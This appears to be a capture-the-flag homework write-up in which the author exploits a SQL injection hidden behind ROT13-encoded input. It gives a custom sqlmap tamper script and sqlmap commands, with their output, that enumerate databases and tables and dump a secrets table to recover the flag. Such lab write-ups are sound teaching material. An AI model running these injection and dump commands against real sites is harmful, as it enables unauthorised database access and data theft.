CrySyS Novice Group - Sorting Encrypted Fruits writeup (2)

This writeup was cross-posted from balazsrostas.me. Author: Balázs Rostás.

This task was given as homework in the CrySyS Novice Group. It was under the “Shop of Quality Lime (and other fruits)” group and was worth 100 points (second level).

Description: Alright, I think we got it right this time. Our new protection is based on an encryption technique that is easy to implement, and believed to be unbreakable (at least by someone who've never heard about cryptography before). This encryption layer should be enough to protect us from normal attackers.

This task is the next level after the first Sorting Fruits. If you haven't solved that, take a look at that before reading on.

So, everything is pretty similar, except that now if you click on any category the order variable is not the same. For example if you click on 'price' you will see this link in the address bar:

(Let's say that our vulnerable site's address was again http://someaddress.com)

http://someaddress.com/?order=cevpr

Adding a apostrophe to the value of the order variable, we get the same warning message again. So everything is the same except the input is somehow obfuscated.

It is not too hard to realize that the cryptography they used is a special case of the Caesar cipher - ROT13 - which replaces each letter with the letter 13 letters after it in the alphabet. Because there are 26 letters in the basic Latin alphabet ROT13 is its own inverse as well. So what we need to do is to apply the ROT13 algorithm to our payload so when the server applies it again it will be the correct injection and not some gibberish.

I used sqlmap again to solve this problem. Everything is very similar to the first version of this problem, except that we need to use a tamper script to solve this one. The tamper script is written in python and it enables us to manipulate/obfuscate the payload before it is sent to the server.

To use the script easily with sqlmap we need to put it in the tamper directory, which is located next to the sqlmap.py file. I've written the following pretty easy tamper script that will do the job for us (I saved it with the name of rot13.py):

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    '''
    Applies rot13 to the payload.
    '''

    retVal = payload.encode('rot13')

    return retVal

Now we will run sqlmap using this tamper script (Note that we use the rot13 version of 'id' to make this work):

python sqlmap.py -u "http://someaddress.com/?order=vq"  
--tamper=rot13 --dbs --technique="B"

This gives us the same databases:

available databases [4]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] test

Then we list the tables in the test database.

python sqlmap.py -u "http://someaddress.com/?order=vq"  
--technique="B" --tamper=rot13 -D test --tables

We get the same tables again:

+----------+  
| products |  
| secrets  |  
+----------+

And dumping the data of the secret table we get our flag:

python sqlmap.py -u "http://someaddress.com/?order=vq"  
--technique="B" --tamper=rot13 -D test -T secrets --dump
+-----------------------------------------+
| secret                                  |
+-----------------------------------------+
| OUR_PHP_USES_ROT13_FOR_MAXIMUM_SECURITY |
+-----------------------------------------+